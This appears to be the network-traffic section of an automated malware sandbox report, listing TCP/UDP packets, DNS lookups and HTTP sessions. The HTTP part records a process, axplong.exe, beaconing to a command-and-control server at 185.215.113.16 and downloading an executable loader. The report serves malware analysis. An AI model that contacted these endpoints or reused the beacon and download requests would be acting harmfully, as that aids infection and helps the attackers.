                                                                                                                                                                Sep 27, 2024 17:43:03.550158978 CEST44349862172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.550414085 CEST44349862172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.552021027 CEST49862443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.595405102 CEST44349862172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.779948950 CEST8049860185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.780430079 CEST4986080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:03.822175980 CEST44349862172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.822577000 CEST44349862172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.822753906 CEST49862443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.822753906 CEST49862443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.822753906 CEST49862443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.844938993 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.845050097 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.845324039 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.862689018 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.862689018 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.862720966 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.862731934 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.902981997 CEST4986080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:03.903340101 CEST4986380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:03.908718109 CEST8049863185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.908821106 CEST4986380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:03.908896923 CEST8049860185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.909044981 CEST4986080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:03.909044981 CEST4986380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:03.914047003 CEST8049863185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:04.085566044 CEST49864443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:04.085643053 CEST44349864172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:04.085714102 CEST49864443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:04.086004972 CEST49864443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:04.086023092 CEST44349864172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:04.144597054 CEST49862443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:04.144620895 CEST44349862172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:04.634247065 CEST8049863185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:04.634404898 CEST4986380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:04.638430119 CEST4986380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:04.638560057 CEST4986580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:04.643548012 CEST8049865185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:04.643630028 CEST4986580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:04.643745899 CEST8049863185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:04.643924952 CEST4986380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:04.644211054 CEST4986580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:04.649116039 CEST8049865185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:04.873476028 CEST44349864172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:04.873611927 CEST49864443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:04.876462936 CEST49864443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:04.876502037 CEST44349864172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:04.877511978 CEST44349864172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:04.878667116 CEST49864443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:04.919428110 CEST44349864172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:05.293803930 CEST44349864172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:05.294023991 CEST44349864172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:05.294086933 CEST49864443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:05.294353962 CEST49864443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:05.294377089 CEST44349864172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:05.294392109 CEST49864443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:05.294399977 CEST44349864172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:05.362236977 CEST8049865185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:05.362349033 CEST4986580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:05.492897034 CEST4986580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:05.493465900 CEST4986680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:05.498526096 CEST8049865185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:05.498541117 CEST8049866185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:05.498584986 CEST4986580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:05.498632908 CEST4986680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:05.498855114 CEST4986680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:05.504095078 CEST8049866185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:05.527498960 CEST49867443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:05.527554035 CEST44349867172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:05.527651072 CEST49867443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:05.528238058 CEST49867443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:05.528255939 CEST44349867172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.019598007 CEST44349867172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.019684076 CEST49867443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:06.034652948 CEST49867443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:06.034693956 CEST44349867172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.035510063 CEST44349867172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.038050890 CEST49867443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:06.079425097 CEST44349867172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.245016098 CEST8049866185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.247445107 CEST4986680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:06.278886080 CEST4986680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:06.283946037 CEST8049866185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.303870916 CEST44349867172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.304136038 CEST44349867172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.304337025 CEST49867443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:06.304713011 CEST49867443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:06.304745913 CEST44349867172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.515132904 CEST8049866185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.515361071 CEST4986680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:06.650926113 CEST4986680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:06.652204037 CEST4986880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:06.656280041 CEST8049866185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.656457901 CEST4986680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:06.657172918 CEST8049868185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:06.658586025 CEST4986880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:06.659894943 CEST4986880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:06.664735079 CEST8049868185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:07.133666039 CEST49869443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:07.133703947 CEST44349869172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:07.133769035 CEST49869443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:07.134218931 CEST49869443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:07.134232998 CEST44349869172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:07.374871016 CEST8049868185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:07.375430107 CEST4986880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:07.378210068 CEST4986880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:07.378531933 CEST4987080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:07.383702040 CEST8049868185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:07.383738041 CEST8049870185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:07.387408972 CEST4986880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:07.387442112 CEST4987080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:07.387698889 CEST4987080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:07.392549038 CEST8049870185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:07.607981920 CEST44349869172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:07.608073950 CEST49869443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:07.609407902 CEST49869443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:07.609414101 CEST44349869172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:07.609733105 CEST44349869172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:07.610565901 CEST49869443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:07.651412010 CEST44349869172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.053556919 CEST44349869172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.053939104 CEST44349869172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.055449009 CEST49869443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:08.055741072 CEST49869443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:08.055754900 CEST44349869172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.055769920 CEST49869443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:08.055774927 CEST44349869172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.150934935 CEST8049870185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.151026964 CEST4987080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.260656118 CEST4987080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.261202097 CEST4987180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.267815113 CEST8049870185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.267831087 CEST8049871185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.267874956 CEST4987080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.267914057 CEST4987180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.273228884 CEST4987180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.278089046 CEST8049871185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.341711998 CEST49872443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:08.341756105 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.341845036 CEST49872443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:08.343040943 CEST49872443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:08.343055010 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.832494974 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.832648993 CEST49872443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:08.847392082 CEST49872443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:08.847440958 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.848021984 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.849124908 CEST49872443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:08.895404100 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.984005928 CEST8049871185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.984062910 CEST4987180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.987535000 CEST4987180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.987950087 CEST4987380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.992830992 CEST8049871185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.992964029 CEST4987180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.993035078 CEST8049873185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.993143082 CEST4987380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.993453979 CEST4987380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.998394966 CEST8049873185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.104836941 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.104950905 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.105087042 CEST49872443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:09.105417967 CEST49872443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:09.105417967 CEST49872443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:09.105463028 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.105475903 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.713608027 CEST8049873185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.713762045 CEST4987380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:09.819128036 CEST4987380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:09.819746017 CEST4987480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:09.824754953 CEST8049873185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.824863911 CEST4987380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:09.825046062 CEST8049874185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.825171947 CEST4987480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:09.825216055 CEST4987480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:09.830720901 CEST8049874185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:10.564949989 CEST8049874185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:10.565022945 CEST4987480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:10.568511963 CEST4987480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:10.568794966 CEST4987580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:10.573681116 CEST8049874185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:10.573759079 CEST4987480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:10.573821068 CEST8049875185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:10.573898077 CEST4987580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:10.574079037 CEST4987580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:10.578921080 CEST8049875185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:11.303515911 CEST8049875185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:11.303720951 CEST4987580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:11.414117098 CEST4987580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:11.414464951 CEST4987680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:11.419265032 CEST8049876185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:11.419413090 CEST4987680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:11.419451952 CEST8049875185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:11.419745922 CEST4987580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:11.419888973 CEST4987680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:11.424607992 CEST8049876185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:12.144037008 CEST8049876185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:12.147452116 CEST4987680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:12.150378942 CEST4987680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:12.150667906 CEST4987780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:12.155483961 CEST8049876185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:12.155529022 CEST8049877185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:12.155602932 CEST4987680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:12.155635118 CEST4987780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:12.155832052 CEST4987780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:12.160572052 CEST8049877185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:12.889877081 CEST8049877185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:12.889940023 CEST4987780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:13.007437944 CEST4987780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:13.007725000 CEST4987880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:13.014189005 CEST8049878185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:13.014261007 CEST4987880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:13.014377117 CEST4987880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:13.015579939 CEST8049877185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:13.015655041 CEST4987780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:13.019248962 CEST8049878185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:13.723464966 CEST8049878185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:13.724644899 CEST4987880192.168.2.4185.215.113.16

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Sep 27, 2024 17:42:04.736905098 CEST6369153192.168.2.41.1.1.1
                                                                                                                                                                Sep 27, 2024 17:42:05.044639111 CEST53636911.1.1.1192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:48.616867065 CEST5653253192.168.2.41.1.1.1
                                                                                                                                                                Sep 27, 2024 17:42:48.669641972 CEST53565321.1.1.1192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:48.701251984 CEST5046553192.168.2.41.1.1.1
                                                                                                                                                                Sep 27, 2024 17:42:48.708861113 CEST53504651.1.1.1192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.940818071 CEST6028953192.168.2.41.1.1.1
                                                                                                                                                                Sep 27, 2024 17:42:54.972533941 CEST53602891.1.1.1192.168.2.4

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Sep 27, 2024 17:42:04.736905098 CEST192.168.2.41.1.1.10xa34cStandard query (0)eijfrhegrtbrfcd.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                Sep 27, 2024 17:42:48.616867065 CEST192.168.2.41.1.1.10xf358Standard query (0)sanctam.netA (IP address)IN (0x0001)false
                                                                                                                                                                Sep 27, 2024 17:42:48.701251984 CEST192.168.2.41.1.1.10x3984Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                Sep 27, 2024 17:42:54.940818071 CEST192.168.2.41.1.1.10x37f6Standard query (0)sanctam.netA (IP address)IN (0x0001)false

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Sep 27, 2024 17:42:05.044639111 CEST1.1.1.1192.168.2.40xa34cNo error (0)eijfrhegrtbrfcd.online172.67.187.100A (IP address)IN (0x0001)false
                                                                                                                                                                Sep 27, 2024 17:42:05.044639111 CEST1.1.1.1192.168.2.40xa34cNo error (0)eijfrhegrtbrfcd.online104.21.64.194A (IP address)IN (0x0001)false
                                                                                                                                                                Sep 27, 2024 17:42:48.669641972 CEST1.1.1.1192.168.2.40xf358Name error (3)sanctam.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Sep 27, 2024 17:42:48.708861113 CEST1.1.1.1192.168.2.40x3984No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                                                Sep 27, 2024 17:42:54.972533941 CEST1.1.1.1192.168.2.40x37f6Name error (3)sanctam.netnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • eijfrhegrtbrfcd.online
                                                                                                                                                                • github.com
                                                                                                                                                                • 185.215.113.16

                                                                                                                                                                HTTP Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.449737185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:02.480288982 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:03.184892893 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:03 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:03.186999083 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:03.414268017 CEST305INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:03 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 33 0d 0a 20 3c 63 3e 31 30 30 30 33 35 39 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 32 66 66 33 66 63 66 65 62 36 35 38 35 34 62 62 62 63 33 31 32 61 32 36 38 39 32 62 63 61 30 62 38 38 66 37 36 63 61 34 39 61 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 73 <c>1000359001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a72ff3fcfeb65854bbbc312a26892bca0b88f76ca49a#<d>0
                                                                                                                                                                Sep 27, 2024 17:42:03.417568922 CEST65OUTGET /inc/loader_5879465914.exe HTTP/1.1
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.636137009 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:03 GMT
                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                Content-Length: 435820
                                                                                                                                                                Last-Modified: Fri, 27 Sep 2024 14:49:05 GMT
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                ETag: "66f6c5e1-6a66c"
                                                                                                                                                                Accept-Ranges: bytes
